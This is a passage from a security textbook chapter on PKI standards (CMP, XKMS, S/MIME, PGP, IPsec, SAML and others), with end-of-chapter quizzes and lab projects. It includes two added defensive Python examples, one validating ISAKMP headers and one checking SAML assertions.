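A parser for the header fields just described, written as an added example for this section (it is not code from the book). Field order and width, the payload and exchange-type code points, and the three flag bits are those of the ISAKMP specification, RFC 2408; the sample datagram is constructed. The checks it performs are the ones a receiver or a network monitor should make before trusting the header: a complete 28-byte header, a major version it understands, a Length field that fits the datagram, and flags that do not contradict each other.

```python
import struct

# ISAKMP fixed header (RFC 2408, section 3.1): 28 bytes, network byte order.
#   Initiator Cookie (8) | Responder Cookie (8) | Next Payload (1) |
#   Major/Minor Version (1) | Exchange Type (1) | Flags (1) | Message ID (4) | Length (4)
ISAKMP_HEADER = struct.Struct("!8s8sBBBBII")
HEADER_LEN = ISAKMP_HEADER.size  # 28

# Code points from RFC 2408; unlisted values are reported numerically.
PAYLOAD_TYPES = {0: "NONE", 1: "SA", 2: "Proposal", 3: "Transform", 4: "Key Exchange",
                 5: "Identification", 6: "Certificate", 7: "Certificate Request",
                 8: "Hash", 9: "Signature", 10: "Nonce", 11: "Notification",
                 12: "Delete", 13: "Vendor ID"}
EXCHANGE_TYPES = {0: "NONE", 1: "Base", 2: "Identity Protection",
                  3: "Authentication Only", 4: "Aggressive", 5: "Informational"}
FLAG_ENCRYPTION, FLAG_COMMIT, FLAG_AUTH_ONLY = 0x01, 0x02, 0x04


def parse_isakmp_header(datagram):
    """Decode and sanity-check the ISAKMP header at the start of a UDP datagram.

    Raises ValueError for anything a receiver should drop rather than process:
    a truncated header, an unexpected major version, a Length field that does
    not fit the datagram, or contradictory flags.
    """
    if len(datagram) < HEADER_LEN:
        raise ValueError("datagram shorter than the 28-byte ISAKMP header")
    (icookie, rcookie, next_payload, version, exchange,
     flags, message_id, length) = ISAKMP_HEADER.unpack_from(datagram)
    major, minor = version >> 4, version & 0x0F
    if major != 1:  # IKEv2 reuses this layout with version 2.0 but is a different protocol
        raise ValueError("unsupported ISAKMP major version %d" % major)
    if length < HEADER_LEN or length > len(datagram):
        raise ValueError("Length field %d inconsistent with %d-byte datagram"
                         % (length, len(datagram)))
    encrypted = bool(flags & FLAG_ENCRYPTION)
    auth_only = bool(flags & FLAG_AUTH_ONLY)
    if encrypted and auth_only:
        raise ValueError("Authentication Only flag set on an encrypted message")
    return {
        "initiator_cookie": icookie.hex(),
        "responder_cookie": rcookie.hex(),
        # An all-zero responder cookie marks the first message of an exchange:
        # the responder has not yet chosen its cookie.
        "first_message": rcookie == bytes(8),
        "next_payload": PAYLOAD_TYPES.get(next_payload, str(next_payload)),
        "version": "%d.%d" % (major, minor),
        "exchange_type": EXCHANGE_TYPES.get(exchange, str(exchange)),
        "flags": {"encryption": encrypted, "commit": bool(flags & FLAG_COMMIT),
                  "auth_only": auth_only},
        "message_id": message_id,
        "length": length,
        "payload": datagram[HEADER_LEN:length],
    }


def is_valid_header(datagram):
    """True when parse_isakmp_header accepts the datagram."""
    try:
        parse_isakmp_header(datagram)
        return True
    except ValueError:
        return False


# Constructed sample: the first message of an Identity Protection exchange,
# carrying one 8-byte SA payload (the payload bytes themselves are dummies).
SAMPLE_PAYLOAD = bytes([0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01])
SAMPLE_DATAGRAM = ISAKMP_HEADER.pack(
    bytes.fromhex("1122334455667788"),   # initiator cookie (constructed value)
    bytes(8),                            # responder cookie: zero, nothing received yet
    1,                                   # next payload: SA
    0x10,                                # major version 1, minor version 0
    2,                                   # exchange type: Identity Protection
    0,                                   # flags: not encrypted, no commit, not auth-only
    0,                                   # message ID 0 during the ISAKMP SA stage
    HEADER_LEN + len(SAMPLE_PAYLOAD),    # Length covers header and payload
) + SAMPLE_PAYLOAD

if __name__ == "__main__":
    print(parse_isakmp_header(SAMPLE_DATAGRAM))
```

The Length check matters most in practice: a header that claims more bytes than the datagram carries is either corruption or an attempt to make a naive parser read past the buffer, and rejecting it up front is cheaper than discovering it while walking the payload chain.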
CMP
The PKIX Certificate Management Protocol (CMP) is specified in RFC 4210. This protocol defines the messages and operations required to provide certificate management services within the PKIX model. Though part of the IETF PKIX effort, CMP provides a framework that works well with other standards, such as PKCS #7 and PKCS #10.
Tech Tip
CMP Summarized
CMP is a protocol to obtain X.509 certificates in a PKI.
CMP provides for the following certificate operations:
CA establishment, including creation of the initial CRL and export of the public key for the CA
Certification of an end-entity, including the following:
    Initial registration and certification of the end-entity (registration, certificate issuance, and placement of the certificate in a repository)
    Updates to the key pair for end-entities, required periodically and when a key pair is compromised or keys cannot be recovered
    End-entity certificate updates, required when a certificate expires
    Periodic CA key-pair updates, similar to end-entity key-pair updates
    Cross-certification requests, placed by other CAs
Certificate and CRL publication, performed under the appropriate conditions of certificate issuance and certificate revocation
Key-pair recovery, a service to restore key-pair information for an end-entity; for example, if a certificate password is lost or the certificate file is lost
Revocation requests, supporting requests by authorized entities to revoke a certificate
CMP also defines mechanisms for performing these operations, either online or offline using files, e-mail, tokens, or web operations.
XKMS
The XML Key Management Specification defines services to manage PKI operations within the Extensible Markup Language (XML) environment. These services are provided for handling PKI keys and certificates automatically. Developed by the World Wide Web Consortium (W3C), XKMS is intended to simplify integration of PKIs and management of certificates in applications. As well as responding to problems of authentication and verification of electronic signatures, XKMS also allows certificates to be managed, registered, or revoked.
XKMS services reside on a separate server that interacts with an established PKI. The services are accessible via a simple XML protocol. Developers can rely on the XKMS services, making it less complex to interface with the PKI. The services provide for retrieving key information (owner, key value, key issuer, and the like) and key management (such as key registration and revocation). Retrieval operations rely on the XML signature for the necessary information. Three tiers of service are based on the client requests and application requirements.
Tier 0 provides a means of retrieving key information by embedding references to the key within the XML signature. The signature contains an element called a retrieval method that indicates ways to resolve the key. In this case, the client sends a request, using the retrieval method, to obtain the desired key information. For example, if the verification key contains a long chain of X.509v3 certificates, a retrieval method could be included to avoid sending the certificates with the document. The client would use the retrieval method to obtain the chain of certificates. For tier 0, the server indicated in the retrieval method responds directly to the request for the key, possibly bypassing the XKMS server. The tier 0 process is shown in Figure 7.6.
• Figure 7.6 XKMS tier 0 retrieval
With tier 1 operations, the client forwards the key-information portions of the XML signature to the XKMS server, relying on the server to perform the retrieval of the desired key information. The desired information can be local to the XKMS server, or it can reside on an external PKI system. The XKMS server provides no additional validation of the key information, such as checking whether the certificate has been revoked or is still valid. Just as in tier 0, the client performs final validation of the document. Tier 1 is called the locate service because it locates the appropriate key information for the client, as shown in Figure 7.7.
• Figure 7.7 XKMS tier 1 locate service
Tier 2 is called the validate service and is illustrated in Figure 7.8. In this case, just as in tier 1, the client relies on the XKMS service to retrieve the relevant key information from the external PKI. The XKMS server also performs data validation on a portion of the key information provided by the client for this purpose. This validation verifies the binding of the key information with the data indicated by the key information contained in the XML signature.
• Figure 7.8 XKMS tier 2 validate service
The primary difference between tier 1 and tier 2 is the level of involvement of the XKMS server. In tier 1, it can serve only as a relay or gateway between the client and the PKI. In tier 2, the XKMS server is actively involved in verifying the relation between the PKI information and the document containing the XML signature.
XKMS relies on the client or underlying communications mechanism to provide for the security of the communications with the XKMS server. The specification suggests using one of three methods for ensuring server authentication, response integrity, and relevance of the response to the request: digitally signed correspondence, a transport layer security protocol (such as SSL, TLS, or WTLS), or a packet layer security protocol (such as IPsec). Obviously, digitally signed correspondence introduces its own issues regarding validation of the signature, which is the purpose of XKMS.
It is possible to define other tiers of service. Tiers 3 and 4, an assertion service and an assertion status service, respectively, are mentioned in the defining XKMS specification, but they are not defined. The specification states they "could" be defined in other documents.
XKMS also provides services for key registration, key revocation, and key recovery. Authentication for these actions is based on a password or passphrase, which is provided when the keys are registered and when they must be recovered.
S/MIME
The Secure/Multipurpose Internet Mail Extensions (S/MIME) message specification is an extension to the MIME standard that provides a way to send and receive signed and encrypted MIME data. RSA Security created the first version of the S/MIME standard, using the RSA encryption algorithm and the PKCS series of standards. The second version dates from 1998 but had a number of serious restrictions, including the restriction to 40-bit Data Encryption Standard (DES). The current version of the IETF standard is dated July 2004 and requires the use of Advanced Encryption Standard (AES).
Cross Check
E-mail Encryption
Want to understand e-mail encryption? Flip ahead to Chapter 16 on e-mail and instant messaging for more details on e-mail encryption. Then answer these questions:
Why is it important to encrypt e-mail? What impacts can malicious code have on a business?
Why is instant messaging a higher risk than e-mail?
The changes in the S/MIME standard were so frequent that, until v3, the standard was difficult to implement. Far from having a stable standard for several years that product manufacturers could have time to gain experience with, there were many changes to the encryption algorithms being used. Just as importantly, and not immediately clear from the IETF documents, the standard places reliance upon more than one other standard for it to function. Key among these is the format of a public key certificate as expressed in the X.509 standard.
IETF S/MIME History
The S/MIME v2 specifications outline a basic strategy for providing security services for e-mail but lack many security features required by the Department of Defense (DoD) for use by the military. Shortly after the decision was made to revise the S/MIME v2 specifications, the DoD, its vendor community, and commercial industry met to begin development of the enhanced specifications. These new specifications would be known as S/MIME v3. Participants agreed that backward compatibility between S/MIME v3 and v2 should be preserved; otherwise, S/MIME v3–compatible applications would not be able to work with older S/MIME v2–compatible applications.
A minimum set of cryptographic algorithms was mandated so that different implementations of the new S/MIME v3 set of specifications could be interoperable. This minimum set must be implemented in an application for it to be considered S/MIME-compliant. Applications can implement additional cryptographic algorithms to meet their customers' needs, but the minimum set must also be present in the applications for interoperability with other S/MIME applications. Thus, users are not forced to use S/MIME-specified algorithms; they can choose their own, but if the application is to be considered S/MIME-compliant, the standard algorithms must also be present.
IETF S/MIME v3 Specifications
Building upon the original work by the IMC-organized group, the IETF has worked hard to enhance the S/MIME v3 specifications. The ultimate goal is to have the S/MIME v3 specifications receive recognition as an Internet standard. The current IETF S/MIME v3 set of specifications includes the following:
Cryptographic Message Syntax (CMS)
S/MIME v3 message specification
S/MIME v3 certificate-handling specification
Enhanced security services (ESS) for S/MIME
Tech Tip
S/MIME in a Nutshell
S/MIME provides two security services to e-mail: digital signatures and message encryption. Digital signatures verify sender identity, and encryption can keep contents private during transmission. These services can be used independently of each other, and provide the foundational basis for message security.
The CMS defines a standard syntax for transmitting cryptographic information about contents of a protected message. Originally based on the PKCS #7 version 1.5 specification, the CMS specification was enhanced by the IETF S/MIME working group to include optional security components. Just as the S/MIME v3 provides backward compatibility with v2, CMS provides backward compatibility with PKCS #7, so applications will be interoperable even if the new components are not implemented in a specific application.
Integrity, authentication, and nonrepudiation security features are provided by using digital signatures using the SignedData syntax described by the CMS. CMS also describes what is known as the EnvelopedData syntax to provide confidentiality of the message's content through the use of encryption. The PKCS #7 specification supports key encryption algorithms, such as RSA. Algorithm independence is promoted through the addition of several fields to the EnvelopedData syntax in CMS, which is the major difference between the PKCS #7 and CMS specifications. The goal was to be able to support specific algorithms such as Diffie-Hellman and the Key Exchange Algorithm (KEA), which is implemented on the Fortezza Crypto Card developed for the DoD. One final significant change to the original specifications is the ability to include X.509 Attribute Certificates in the SignedData and EnvelopedData syntaxes for CMS.
CMS Triple-Encapsulated Message
An interesting feature of CMS is the ability to nest security envelopes to provide a combination of security features. As an example, a CMS triple-encapsulated message can be created in which the original content and associated attributes are signed and encapsulated within the inner SignedData object. The inner SignedData object is in turn encrypted and encapsulated within an EnvelopedData object. The resulting EnvelopedData object is then also signed and finally encapsulated within a second SignedData object, the outer SignedData object. Usually the inner SignedData object is signed by the original user and the outer SignedData object is signed by another entity, such as a firewall or a mail list agent, providing an additional level of security.
This triple encapsulation is not required of every CMS object. All that is required is a single SignedData object created by the user to sign a message or an EnvelopedData object if the user desired to encrypt a message.
OpenPGP is a widely used e-mail encryption standard. A nonproprietary protocol for encrypting e-mail using public key cryptography, it is based on PGP as originally developed by Phil Zimmermann, and is defined by the OpenPGP working group of the IETF proposed standard RFC 4880.
PGP
Pretty Good Privacy (PGP) is a popular program that is used to encrypt and decrypt e-mail and files. It also provides the ability to digitally sign a message so the receiver can be certain of the sender's identity. Taken together, encrypting and signing a message allows the receiver to be assured of who sent the message and to know that it was not modified during transmission. Public-domain versions of PGP have been available for years, as have inexpensive commercial versions.
PGP was one of the most widely used programs and was frequently used by both individuals and businesses to ensure data and e-mail privacy. It was developed by Philip R. Zimmermann in 1991 and quickly became a de facto standard for e-mail security. The popularity of PGP led to the OpenPGP Internet standard, RFC 4880, and open source solutions. GNU Privacy Guard (GPG) is a common alternative to PGP in use today.
Tech Tip
A PGP Personal Note
After distributing PGP in 1991, including (indirectly) internationally, Zimmermann became a formal target of a criminal investigation by the U.S. government in 1993 for exporting munitions without a license, because cryptosystems using keys larger than 40 bits were considered "munitions" under U.S. export law. Zimmermann proceeded to publish the entire source code of PGP in a hardback book, which, unlike software, is protected from export laws by the First Amendment of the U.S. Constitution. The investigation of Zimmermann was dropped after several years.
How PGP Works
PGP uses a variation of the standard public key encryption process. In public key encryption, an individual (here called the creator) uses the encryption program to create a pair of keys. One key is known as the public key and is designed to be given freely to others. The other key is called the private key and is designed to be known only by the creator. Individuals who want to send a private message to the creator encrypt the message using the creator's public key. The algorithm is designed such that only the private key can decrypt the message, so only the creator will be able to decrypt it.
This method, known as public key or asymmetric encryption, is time consuming. Symmetric encryption uses only a single key and is generally faster. It is because of this that PGP is designed the way it is. PGP uses a symmetric encryption algorithm to encrypt the message to be sent. It then encrypts the symmetric key used to encrypt this message with the public key of the intended recipient. Both the encrypted key and message are then sent. The receiver's version of PGP first decrypts the symmetric key with the private key supplied by the recipient and then uses the resulting decrypted key to decrypt the rest of the message.
PGP can use two different public key algorithms: Rivest-Shamir-Adleman (RSA) and Diffie-Hellman. The RSA version uses the International Data Encryption Algorithm (IDEA) and a short symmetric key to encrypt the message and then uses RSA to encrypt the short IDEA key using the recipient's public key. The Diffie-Hellman version uses the Carlisle Adams and Stafford Tavares (CAST) algorithm to encrypt the message and the Diffie-Hellman algorithm to encrypt the CAST key. To decrypt the message, the reverse is performed. The recipient uses their private key to decrypt the IDEA or CAST key, and then uses that decrypted key to decrypt the message. These are both illustrated in Figure 7.9.
• Figure 7.9 How PGP works for encryption
To generate a digital signature, PGP takes advantage of another property of public key encryption schemes. Normally, the sender encrypts using the receiver's public key and the message is decrypted at the other end using the receiver's private key. The process can be reversed so that the sender encrypts (signs) with his own private key. The receiver then decrypts the message with the sender's public key. Since the sender is the only individual who has a key that will correctly be decrypted with the sender's public key, the receiver knows that the message was created by the sender who claims to have sent it. The way PGP accomplishes this task is to generate a hash value from the user's name and other signature information. This hash value is then encrypted with the sender's private key known only by the sender. The receiver uses the sender's public key, which is available to everyone, to decrypt the hash value. If the decrypted hash value matches the hash value sent as the digital signature for the message, then the receiver is assured that the message was sent by the sender who claims to have sent it.
Typically, versions of PGP contain a user interface that works with common e-mail programs such as Microsoft Outlook. If you want others to be able to send you an encrypted message, you need to register your public key, generated by your PGP program, with a PGP public key server. Alternatively, you have to either send your public key to all those who want to send you an encrypted message or post your key to some location from which they can download it, such as your web page. Note that using a public key server is the better method, for all the reasons of trust described in the discussion of PKIs in Chapter 6.
Tech Tip
Where Can You Use PGP?
For many years the U.S. government waged a fight over the exportation of PGP technology, and for many years its exportation was illegal. Today, however, PGP-encrypted e-mail can be exchanged with most users outside the United States, and many versions of PGP are available from numerous international sites. Of course, being able to exchange PGP-encrypted e-mail requires that the individuals on both sides of the communication have valid versions of PGP. Interestingly, international versions of PGP are just as secure as domestic versions—a feature that is not true of other encryption products. It should be noted that the freeware versions of PGP are not licensed for commercial purposes.
HTTPS
Most web activity occurs using HTTP, but this protocol is prone to interception. HTTPS uses either SSL or TLS to secure the communication channel. Originally developed by Netscape Communications and implemented in its browser, HTTPS has since been incorporated into most common browsers. HTTPS uses the standard TCP port 443 for TCP/IP communications rather than the standard port 80 used for HTTP. As previously discussed, because of vulnerabilities in SSL, only TLS is recommended for HTTPS today.
IPsec
IPsec is a collection of IP security features designed to introduce security at the network or packet-processing layer in network communication. Other approaches have attempted to incorporate security at higher levels of the TCP/IP suite such as at the level where applications reside. IPsec is designed to provide secure IP communications over the Internet. In essence, IPsec provides a secure version of the IP by introducing authentication and encryption to protect Layer 4 protocols. IPsec is optional for IPv4 but is required for IPv6. Obviously, both ends of the communication need to use IPsec for the encryption/decryption process to occur. IPsec provides two types of security service to ensure authentication and confidentiality for either the data alone (referred to as IPsec transport mode) or for both the data and header (referred to as tunnel mode). See Chapter 11 for more detail on tunneling and IPsec operation.
IPsec introduces several new protocols, including the Authentication Header (AH), which basically provides authentication of the sender, and the Encapsulating Security Payload (ESP), which adds encryption of the data to ensure confidentiality. IPsec also provides for payload compression before encryption using the IP Payload Compression Protocol (IPcomp). Frequently, encryption negatively impacts the ability of compression algorithms to fully compress data for transmission. By providing the ability to compress the data before encryption, IPsec addresses this issue.
CEP
Certificate Enrollment Protocol (CEP) was originally developed by VeriSign for Cisco Systems. It was designed to support certificate issuance, distribution, and revocation using existing technologies. Its use has grown in client and CA applications. The operations supported include CA and RA public key distribution, certificate enrollment, certificate revocation, certificate query, and CRL query.
One of the key goals of CEP was to use existing technology whenever possible. It uses both PKCS #7 (Cryptographic Message Syntax Standard) and PKCS #10 (Certification Request Syntax Standard) to define a common message syntax. It supports access to certificates and CRLs using either the Lightweight Directory Access Protocol (LDAP) or the CEP-defined certificate query.
Other Standards
There are many additional standards associated with information security that are not specifically or solely associated with PKI and/or cryptography. The remainder of the chapter will introduce these standards and protocols.
FIPS
The Federal Information Processing Standards Publications (FIPS PUBS or simply FIPS) describe various standards for data communication issues. These documents are issued by the U.S. government through the National Institute of Standards and Technology (NIST), which is tasked with their development. NIST creates these publications when a compelling government need requires a standard for use in areas such as security or system interoperability and no recognized industry standard exists. Three categories of FIPS PUBS are currently maintained by NIST:
Hardware and software standards/guidelines
Data standards/guidelines
Computer security standards/guidelines
These documents require that products sold to the U.S. government comply with one (or more) of the FIPS standards. The standards can be obtained from www.nist.gov/itl/fips.cfm.
FIPS 140-2 relates to specific cryptographic standards for the validation of components used in U.S. government systems. Systems can be accredited to the FIPS 140-2 standard to demonstrate levels of security from "approved algorithms" to higher levels that include additional protection up to and including physical security and tamperproof mechanisms.
Common Criteria
The Common Criteria for Information Technology Security (Common Criteria or CC) is the result of an effort to develop a joint set of security processes and standards that can be used by the international community. The major contributors to the CC are the governments of the United States, Canada, France, Germany, the Netherlands, and the United Kingdom. The CC also provides a listing of laboratories that apply the criteria in testing security products. Products that are evaluated by one of the approved laboratories receive an Evaluation Assurance Level of EAL1 through EAL7 (EAL7 is the highest level), with EAL4, for example, designed for environments requiring a moderate to high level of independently assured security, and EAL1 being designed for environments in which some confidence in the correct operation of the system is required but where the threats to the system are not considered serious. The CC also provides a listing of products by function that have performed at a specific EAL.
WTLS
The Wireless Transport Layer Security (WTLS) protocol is based on the TLS protocol. WTLS provides reliability and security for wireless communications using the Wireless Application Protocol (WAP). WTLS is necessary due to the limited memory and processing abilities of WAP-enabled phones. WTLS can be implemented in one of three classes: Class 1 is called anonymous authentication but is not designed for practical use. Class 2 is called server authentication and is the most common model. The clients and server may authenticate using different means. Class 3 is server and client authentication. In Class 3 authentication, the client's and server's WTLS certificates are authenticated. Class 3 is the strongest form of authentication and encryption.
ISO/IEC 27002 (Formerly ISO 17799)
ISO/IEC 27002 is a very popular and detailed standard for creating and implementing security policies. ISO/IEC 27002 was formerly ISO 17799, which was based on version 2 of the British Standard 7799 (BS 7799) published in May 1999. With the increased emphasis placed on security in both the government and industry in recent years, many organizations are now training their audit personnel to evaluate their organizations against the ISO/IEC 27002 standard. The standard is divided into 12 sections, each containing more detailed statements describing what is involved for that topic:
Risk assessment: Determine the impact of risks
Security policy: Guidance and policy provided by management
Organization of information security: Governance structure to implement security policy
Asset management: Inventory and classification of assets
Human resources security: Policies and procedures addressing security for employees including hires, changes, and departures
Physical and environmental security: Protection of the computer facilities
Communications and operations management: Management of technical security controls in systems and networks
Access control: Restriction of access rights to networks, systems, applications, functions, and data
Information systems acquisition, development, and maintenance: Building security into applications
Information security incident management: Anticipating and responding appropriately to information security breaches
Business continuity management: Protecting, maintaining, and recovering business-critical processes and systems
Compliance: Ensuring conformance with information security policies, standards, laws, and regulations
SAML
Security Assertion Markup Language (SAML) is a single sign-on capability used for web applications to ensure user identities can be shared and are protected. It defines standards for exchanging authentication and authorization data between security domains. It is becoming increasingly important with cloud-based solutions and with Software-as-a-Service (SaaS) applications, because it ensures interoperability across identity providers.
SAML is an XML-based protocol that uses security tokens and assertions to pass information about a "principal" (typically an end user) with a SAML authority (an "identity provider" or IdP) and the service provider (SP). The principal requests a service from the SP, which then requests and obtains an identity assertion from the IdP. The SP can then grant access or perform the requested service for the principal.
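The assertion the SP obtains from the IdP is only as good as the checks the SP makes on it before granting access. The following added example (not from the book, and not from any SAML library) shows those checks on a constructed SAML 2.0 assertion: the issuer must be the expected IdP, the current time must fall inside the Conditions window, the assertion must be addressed to this SP, and it must name a subject. The IdP's XML signature over the assertion, which must be verified before any of this, is omitted because the standard library has no XML-DSig support; the issuer, subject and audience values are invented sample data.

```python
import xml.etree.ElementTree as ET
from datetime import datetime, timezone

SAML = {"saml": "urn:oasis:names:tc:SAML:2.0:assertion"}

# Constructed sample assertion (a real one carries a ds:Signature element).
SAMPLE_ASSERTION = """<saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"
                ID="_a1b2c3" Version="2.0" IssueInstant="2016-03-01T12:00:00Z">
  <saml:Issuer>https://idp.example.com</saml:Issuer>
  <saml:Subject><saml:NameID>alice@example.com</saml:NameID></saml:Subject>
  <saml:Conditions NotBefore="2016-03-01T12:00:00Z" NotOnOrAfter="2016-03-01T12:05:00Z">
    <saml:AudienceRestriction>
      <saml:Audience>https://sp.example.com</saml:Audience>
    </saml:AudienceRestriction>
  </saml:Conditions>
</saml:Assertion>"""


def _utc(stamp):
    """Parse the SAML 'Z' timestamp form into an aware datetime."""
    return datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def check_assertion(xml_text, expected_issuer, expected_audience, now):
    """Checks an SP must make before granting access on an assertion's say-so.

    `now` is passed in (as a 'Z' timestamp string) so the validity window can be
    tested deterministically. Returns (subject, problems); an empty problem list
    means the assertion may be accepted for that subject.
    """
    root = ET.fromstring(xml_text)
    problems = []

    issuer = root.findtext("saml:Issuer", namespaces=SAML)
    if issuer != expected_issuer:
        problems.append("unexpected issuer: %r" % issuer)

    conditions = root.find("saml:Conditions", SAML)
    if conditions is None:
        problems.append("no Conditions element: validity cannot be bounded")
    else:
        t = _utc(now)
        not_before = conditions.get("NotBefore")
        not_on_or_after = conditions.get("NotOnOrAfter")
        if not_before and t < _utc(not_before):
            problems.append("assertion not yet valid")
        if not_on_or_after is None or t >= _utc(not_on_or_after):
            problems.append("assertion expired or has no expiry")
        audiences = [a.text for a in
                     conditions.findall("saml:AudienceRestriction/saml:Audience", SAML)]
        if expected_audience not in audiences:
            problems.append("audience mismatch: %r" % audiences)

    subject = root.findtext("saml:Subject/saml:NameID", namespaces=SAML)
    if subject is None:
        problems.append("no subject NameID")
    return subject, problems


if __name__ == "__main__":
    print(check_assertion(SAMPLE_ASSERTION, "https://idp.example.com",
                          "https://sp.example.com", "2016-03-01T12:02:00Z"))
```

The audience check is the one most often skipped: without it, an assertion the IdP issued for one SP can be replayed to another SP that trusts the same IdP, which is why every result here is a list of named problems rather than a single yes or no.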
Chapter 7 Review
Chapter Summary
After reading this chapter and completing the exercises, you should understand the following about PKI standards and protocols.
Identify the standards involved in establishing an interoperable Internet PKI
PKIX and PKCS define the most commonly used PKI standards.
PKIX, PKCS, X.509, ISAKMP, XKMS, and CMP combine to implement PKI.
SSL/TLS, S/MIME, HTTPS, and IPsec are protocols that use PKI.
Explain interoperability issues with PKI standards
Standards and protocols are important because they define the basis for how communication will take place. The use of standards and protocols provides a common, interoperable environment for securely exchanging information.
Without these standards and protocols, two entities may independently develop their own method to implement the various components for a PKI, and the two will not be compatible.
On the Internet, not being compatible and not being able to communicate is not an option.
Describe how the common Internet protocols implement the PKI standards
Three main standards have evolved over time to implement PKIs on the Internet.
Two of the main standards are based on a third standard, the X.509 standard, and establish complementary standards for implementing PKIs. These two standards are Public Key Infrastructure X.509 (PKIX) and Public Key Cryptography Standards (PKCS).
PKIX defines standards for interactions and operations for four component types: the user (end-entity), certificate authority (CA), registration authority (RA), and the repository for certificates and certificate revocation lists (CRLs).
PKCS defines many of the lower-level standards for message syntax, cryptographic algorithms, and the like.
There are other protocols and standards that help define the management and operation of the PKI and related services, such as ISAKMP, XKMS, and CMP.
S/MIME is used to encrypt e-mail.
SSL, TLS, and WTLS are used for secure packet transmission.
IPsec is used to support virtual private networks.
The Common Criteria establishes a series of criteria from which security products can be evaluated.
The ISO/IEC 27002 standard provides a point from which security policies and practices can be developed in twelve areas.
Various types of publications are available from NIST such as those found in the FIPS series.
Key Terms
certificate
certificate authority (CA)
certificate revocation list (CRL)
Internet Security Association and Key Management Protocol (ISAKMP)
IPsec
Pretty Good Privacy (PGP)
public key infrastructure (PKI)
Secure/Multipurpose Internet Mail Extensions (S/MIME)
Secure Sockets Layer (SSL)
Security Assertion Markup Language (SAML)
Transport Layer Security (TLS)
Wireless Application Protocol (WAP)
Wireless Transport Layer Security (WTLS)
X.509
Key Terms Quiz
Use terms from the Key Terms list to complete the sentences that follow. Don't use the same term more than once. Not all terms will be used.
1. _______________ is a protocol used to secure IP packets during transmission across a network. It offers authentication, integrity, and confidentiality services. It uses Authentication Headers (AHs) and Encapsulating Security Payload (ESP) to accomplish this functionality.
2. An encryption capability designed to encrypt above the transport layer, enabling secure sessions between hosts, is called ______________.
3. A(n) _______________ is an entity that is responsible for issuing and revoking certificates. This term is also applied to server software that provides these services.
4. A digitally signed object that lists all of the current but revoked certificates issued by a given certificate authority is called the ______________. It allows users to verify whether a certificate is currently valid even if the expiration date hasn't passed.
5. _______________ is a format that has been adopted to standardize digital certificates.
6. Infrastructure for binding a public key to a known user through a trusted intermediary, typically a certificate authority, is called the _______________.
7. The _______________ is a protocol framework that defines the mechanics of implementing a key exchange protocol and negotiation of a security policy.
8. The encryption protocol that is used on Wireless Application Protocol (WAP) networks is called _______________.
9. A protocol for transmitting data to small handheld devices like cellular phones is the _______________.
10. _______________ is a popular encryption program that has the ability to encrypt and digitally sign e-mail and files.
Multiple-Choice Quiz
1. Which of the following is used to grant permissions using rule-based, role-based, and rank-based access controls?
A. A Qualified Certificate
B. A Control Certificate
C. An Attribute Certificate
D. An Optional Certificate
2. XKMS allows certificates to be all of the following except:
A. Created
B. Registered
C. Managed
D. Revoked
3. Transport Layer Security consists of which two protoc

ols?
A. The TLS Record Protocol and TLS Handshake Protocol
B. The TLS Record Protocol and TLS Certificate Protocol
C. The TLS Certificate Protocol and TLS Handshake Protocol
D. The TLS Key Protocol and TLS Handshake Protocol
4. Which of the following provides a method for implementing a key exchange protocol?
A. EISA
B. ISAKMP
C. ISA
D. ISAKEY
5. Which of the following is a detailed standard for creating and implementing security policies?
A. PKIX
B. ISO/IEC 27002
C. FIPS
D. X.509
6. A relationship where two or more entities define how they will communicate securely is known as what?
A. A three-way handshake
B. A security association
C. A three-way agreement
D. A security agreement
7. What is the purpose of XKMS?
A. Extends session associations over many transport protocols
B. Encapsulates session associations over TCP/IP
C. Defines services to manage heterogeneous PKI operations via XML
D. Designed to replace SSL
8. Which of the following is a secure e-mail standard?
A. POP3
B. IMAP
C. SMTP
D. S/MIME
9. Which of the following is a joint set of security processes and standards used by approved laboratories to award an Evaluation Assurance Level (EAL) from EAL1 to EAL7?
A. Common Criteria
B. FIPS
C. ISO 17700
D. IEEE X.509
10. Transport Layer Security for HTTP uses what port to communicate?
A. 53
B. 80
C. 143
D. 443
Essay Quiz
1. You are the Information Security Officer at a medium-sized company (1500 employees). The CIO has asked you to explain why you recommend using commercial PKIs rather than implementing such a capability in-house with the software developers you already have. Write three succinct sentences that would get your point across and address three key issues.
2. Imagine you are a web developer for a small locally owned business. Explain when using HTTP would be satisfactory and why, and explain when you should use HTTPS and why.
3. Explain in your own words how, by applying both asymmetric and symmetric encryption, your browser uses TLS to protect the privacy of the information passing between your browser and a web server.
4. It is well understood that asymmetric encryption consumes more computing resources than symmetric encryption. Explain how PGP uses both asymmetric and symmetric encryption to be both secure and efficient.
Lab Projects
Note that for these lab projects, it would be best to have a partner so that you can each have your own pair of public/private keys to confirm the operation of PGP.
• Lab Project 7.1 Load either a trial version of PGP or Gnu Privacy Guard (GPG). Install it and create a public/private key pair for yourself. Create a document using a word processor and encrypt it using the receiver's public key. Send it to a partner (or yourself) and then decrypt it using the corresponding private key.
• Lab Project 7.2 Create another document different from the one used in Lab Project 7.1. This time use your private key to digitally sign the document and send it to a partner (or yourself) who can then use the public key to confirm that it really is from the indicated sender.
Chapter 8 Physical Security
Baseball is 90 percent mental, the other half is physical.
—YOGI BERRA
In this chapter, you will learn how to
Describe how physical security directly affects computer and network security
Discuss steps that can be taken to help mitigate risks
Identify the different types of fires and the various fire suppression systems designed to limit the damage caused by fires
Explain electronic access controls and the principles of convergence
For most homes, locks are the primary means of achieving physical security, and almost everyone locks the doors to his or her home upon leaving the residence. Some go even further and set up intrusion alarm systems in addition to locks. All these precautions are considered necessary because people believe they have something significant inside the house that needs to be protected, such as important possessions and important people.
Physical security is an important topic for businesses dealing with the security of networks and information systems. Businesses are responsible for securing their profitability, which requires securing a combination of assets: employees, product inventory, trade secrets, and strategy information. These and other important assets affect the profitability of a company and its future survival. Companies therefore perform many activities to attempt to provide physical security—locking doors, installing alarm systems, using safes, posting security guards, setting access controls, and more.
Most companies today have invested a large amount of time, money, and effort in both network security and information systems security. In this chapter, you will learn about how the strategies for securing the network and for securing information systems are linked, and you'll learn several methods by which companies can minimize their exposure to physical security events that can diminish their network security.
The Security Problem
The problem that faces professionals charged with securing a company's network can be stated rather simply: physical access negates all other security measures. No matter how impenetrable the firewall and intrusion detection system (IDS), if an attacker can find a way to walk up to and touch a server, he can break into it.
